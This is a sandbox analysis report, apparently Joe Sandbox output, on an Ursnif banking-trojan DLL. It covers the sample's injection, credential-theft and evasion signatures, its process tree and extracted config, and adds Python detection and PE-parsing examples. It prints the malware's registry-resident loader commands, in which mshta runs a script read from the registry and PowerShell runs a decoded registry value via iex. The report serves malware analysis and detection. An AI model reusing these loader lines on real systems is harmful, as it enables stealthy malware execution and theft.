
Analysis Report yytr.dll

Overview

General Information

Sample Name: yytr.dll
Analysis ID: 350433
MD5: ba2befa9c70c2b6d779c48a59cece3e5
SHA1: 4c855f80076e357d35c7d60cd52d2c49abefc5ff
SHA256: 9c51cbe4681facc34623aeca27a18dbaa6db1337990a0e003b7c9babeb06c1eb

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Contains functionality to detect sleep reduction / modifications
Creates a thread in another existing process (thread injection)
Disables SPDY in the browser (likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5964 cmdline: loaddll32.exe 'C:\Users\user\Desktop\yytr.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)
    • rundll32.exe (PID: 4576 cmdline: rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • control.exe (PID: 5656 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 6556 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5952 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5988 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5920 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4596 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6788 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 2628 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5040 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6564 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5604 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@618321hh", "dns": "618321", "version": "250177", "uptime": "372", "crc": "2", "id": "3131", "user": "4229768108f8d2d8cdc8873a70351dbe", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(further entries not shown)

            Sigma Overview

            System Summary:

            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4552, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline', ProcessId: 5040
            Sigma detected: MSHTA Spawning Windows Shell
            Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 4552
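The two Sigma hits above and the process tree under Startup describe a single chain: mshta.exe evaluates a script it pulls out of HKCU\Software\AppDataLow\Software\Microsoft\<GUID> with WScript.Shell.RegRead, spawns powershell.exe, which reads a byte array from the same key, ASCII-decodes it and hands it to iex, and that stage drives csc.exe to compile from %LOCALAPPDATA%\Temp. The Python below is an added example, not Joe Sandbox code and not part of this report, that runs those checks over constructed process-creation events modelled on the tree: PIDs 2628, 4552 and 5040, their parent links and their command lines are copied from the report; the explorer.exe parent (PID 1234), the devenv.exe build and the interactive PowerShell are invented for comparison; and the registry-script rule is this editor's heuristic derived from this one sample, not a published Sigma rule.

```python
"""Detection logic for the mshta -> powershell -> csc chain in this report.
Added example: runs over constructed process-creation events, not Joe Sandbox code."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full image path as a process-creation log carries it
    cmdline: str   # command line as logged


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
# Locations a compile driven by a user-writable .cmdline file should not come from.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\", "\\programdata\\")

# Editor's heuristic for this sample's registry-resident loader: the HTA fetches its script with
# WScript.Shell.RegRead, and PowerShell reads the next stage from the same
# HKCU\Software\AppDataLow\... key and passes it to Invoke-Expression.
REG_READ = re.compile(r"regread\s*\(", re.I)
REG_GET = re.compile(r"\b(gp|get-itemproperty)\b", re.I)
IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)
APPDATALOW = re.compile(r"hkcu[:\\]+software\\+appdatalow\\+", re.I)

# Command lines copied from the report's Startup tree.
MSHTA_CMD = r"""'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'"""
PS_CMD = r"""'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))"""
CSC_CMD = r"""'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'"""

# Constructed event set: PIDs 2628/4552/5040 and their parent links are from the report; the
# explorer.exe parent (PID 1234) and the two benign processes are invented for comparison.
EVENTS = [
    ProcEvent(1234, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2628, 1234, r"C:\Windows\System32\mshta.exe", MSHTA_CMD),
    ProcEvent(4552, 2628, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    ProcEvent(5040, 4552, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", CSC_CMD),
    ProcEvent(5000, 1234, r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "devenv.exe"),
    ProcEvent(7777, 5000, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"csc.exe /noconfig @C:\Users\user\source\repos\app\obj\Debug\app.cmdline"),
    ProcEvent(8888, 1234, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile Get-Process"),
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def mshta_spawns_shell(ev, parent):
    """Sigma 'MSHTA Spawning Windows Shell': parent image mshta.exe, child a shell or script host."""
    return parent is not None and image_name(parent.image) == "mshta.exe" and image_name(ev.image) in SHELLS


def compile_from_suspicious_path(ev):
    """Sigma 'Dot net compiler compiles file from suspicious location'."""
    if image_name(ev.image) not in COMPILERS:
        return False
    low = ev.cmdline.lower()
    return any(d in low for d in SUSPICIOUS_DIRS)


def script_from_registry(ev):
    """Editor's heuristic: script body or next stage read from HKCU\\Software\\AppDataLow and executed."""
    name = image_name(ev.image)
    if name == "mshta.exe":
        return bool(REG_READ.search(ev.cmdline) and APPDATALOW.search(ev.cmdline))
    if name in ("powershell.exe", "pwsh.exe"):
        return bool(IEX.search(ev.cmdline) and REG_GET.search(ev.cmdline) and APPDATALOW.search(ev.cmdline))
    return False


def ancestry(ev, by_pid):
    """Walk parent links (stopping at unknown or cyclic PIDs) and render root -> leaf."""
    chain, seen = [ev], {ev.pid}
    while chain[-1].ppid in by_pid and chain[-1].ppid not in seen:
        chain.append(by_pid[chain[-1].ppid])
        seen.add(chain[-1].pid)
    return " -> ".join(image_name(e.image) for e in reversed(chain))


def run_detections(events):
    """Return (rule, pid, ancestry) for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if mshta_spawns_shell(ev, parent):
            hits.append(("mshta_spawns_shell", ev.pid, ancestry(ev, by_pid)))
        if compile_from_suspicious_path(ev):
            hits.append(("dotnet_compile_suspicious_path", ev.pid, ancestry(ev, by_pid)))
        if script_from_registry(ev):
            hits.append(("script_from_registry", ev.pid, ancestry(ev, by_pid)))
    return hits


if __name__ == "__main__":
    for rule, pid, chain in run_detections(EVENTS):
        print(f"{rule:32} pid={pid:<5} {chain}")
```

The ancestry string is what turns three independent alerts into one incident: csc.exe compiling from Temp is noisy on developer machines (the devenv.exe case above stays silent), but csc.exe whose grandparent is mshta.exe is not. The registry heuristic keys on the RegRead/Get-ItemProperty plus Invoke-Expression pair rather than on the GUID-named key, which changes per infection.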

            Signature Overview

            AV Detection:

            Found malware configuration
            Source: loaddll32.exe.5964.0.memstr | Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@618321hh", "dns": "618321", "version": "250177", "uptime": "372", "crc": "2", "id": "3131", "user": "4229768108f8d2d8cdc8873a70351dbe", "soft": "3"}
            Multi AV Scanner detection for submitted file
            Source: yytr.dll | Virustotal: Detection: 43%
            Source: yytr.dll | ReversingLabs: Detection: 39%
            Machine Learning detection for sample
            Source: yytr.dll | Joe Sandbox ML: detected
            Source: 0.2.loaddll32.exe.f50174.3.unpack | Avira: Label: TR/Kazy.4159236
            Source: 1.2.rundll32.exe.4520174.4.unpack | Avira: Label: TR/Kazy.4159236

            Compliance:

            Uses 32bit PE files
            Source: yytr.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
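The static characteristics line above and the signature "PE file does not import any functions" in the overview are both read straight from the PE headers. The Python below is an added example, not Joe Sandbox code, that decodes IMAGE_FILE_HEADER.Characteristics and inspects the import data directory; the seven flags reported for yytr.dll encode as 0xA18E, and the blob it parses is a constructed minimal PE32 header built for the test, not the sample itself.

```python
"""Static PE header triage reproducing two checks from this report: decode
IMAGE_FILE_HEADER.Characteristics and test for an empty import directory.
Added example with a constructed header, not Joe Sandbox code."""
import struct

# IMAGE_FILE_* characteristic bits from winnt.h (AGGRESIVE_WS_TRIM keeps the header's spelling).
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0010: "AGGRESIVE_WS_TRIM", 0x0020: "LARGE_ADDRESS_AWARE",
    0x0080: "BYTES_REVERSED_LO", 0x0100: "32BIT_MACHINE", 0x0200: "DEBUG_STRIPPED",
    0x0400: "REMOVABLE_RUN_FROM_SWAP", 0x0800: "NET_RUN_FROM_SWAP", 0x1000: "SYSTEM",
    0x2000: "DLL", 0x4000: "UP_SYSTEM_ONLY", 0x8000: "BYTES_REVERSED_HI",
}
IMAGE_FILE_MACHINE_I386 = 0x014C
IMPORT_DIRECTORY_INDEX = 1   # IMAGE_DIRECTORY_ENTRY_IMPORT


def decode_characteristics(value):
    return [name for bit, name in sorted(CHARACTERISTICS.items()) if value & bit]


def parse_headers(data):
    """Return machine, characteristics and the import data directory of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32: NumberOfRvaAndSizes at 92, data directories at 96
        nrva_off, dir_off = 92, 96
    elif magic == 0x20B:      # PE32+: 108 and 112
        nrva_off, dir_off = 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    nrva = struct.unpack_from("<I", data, opt + nrva_off)[0]
    import_rva = import_size = 0
    if nrva > IMPORT_DIRECTORY_INDEX:
        import_rva, import_size = struct.unpack_from(
            "<II", data, opt + dir_off + 8 * IMPORT_DIRECTORY_INDEX)
    return {"machine": machine, "sections": nsections, "characteristics": chars,
            "pe32plus": magic == 0x20B, "import_rva": import_rva, "import_size": import_size}


def triage(data):
    """Findings in the spirit of the report's signatures; each is a heuristic, not a verdict."""
    info = parse_headers(data)
    flags = decode_characteristics(info["characteristics"])
    findings = []
    if info["machine"] == IMAGE_FILE_MACHINE_I386 and "32BIT_MACHINE" in flags:
        findings.append("32-bit PE" + (" DLL" if "DLL" in flags else ""))
    if info["import_size"] == 0 and info["import_rva"] == 0:
        findings.append("no import directory (APIs must be resolved at runtime)")
    if "BYTES_REVERSED_LO" in flags or "BYTES_REVERSED_HI" in flags:
        findings.append("deprecated BYTES_REVERSED flags set (unusual for modern linkers)")
    return findings


def build_pe32(characteristics, import_size, nsections=0):
    """Constructed minimal PE32 headers (no sections, no code) for offline testing."""
    ndirs = 16
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, nsections,
                           0, 0, 0, 96 + 8 * ndirs, characteristics)
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", ndirs)
    import_rva = 0x3000 if import_size else 0
    dirs = (struct.pack("<II", 0, 0) + struct.pack("<II", import_rva, import_size)
            + b"\0" * (8 * (ndirs - 2)))
    return dos + b"PE\0\0" + file_hdr + opt + dirs


if __name__ == "__main__":
    sample_like = build_pe32(0xA18E, 0)   # the flag set reported for yytr.dll, no imports
    print(decode_characteristics(parse_headers(sample_like)["characteristics"]))
    for finding in triage(sample_like):
        print("-", finding)
```

An empty import directory is a strong packer or loader signal on its own: the code cannot call anything without first resolving addresses itself, which is exactly what "Extensive use of GetProcAddress" and "Contains functionality to dynamically determine API calls" in the overview describe. A tiny import table (only LoadLibrary and GetProcAddress) is the common variant and needs the import descriptors walked through the section table, which this header-only parser deliberately does not do.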
            Uses new MSVCR Dlls
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Uses secure TLS version for HTTPS connections
            Source: unknown | HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2
            Binary contains paths to debug symbols
            Source: Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
            Source: Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
            Source: Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
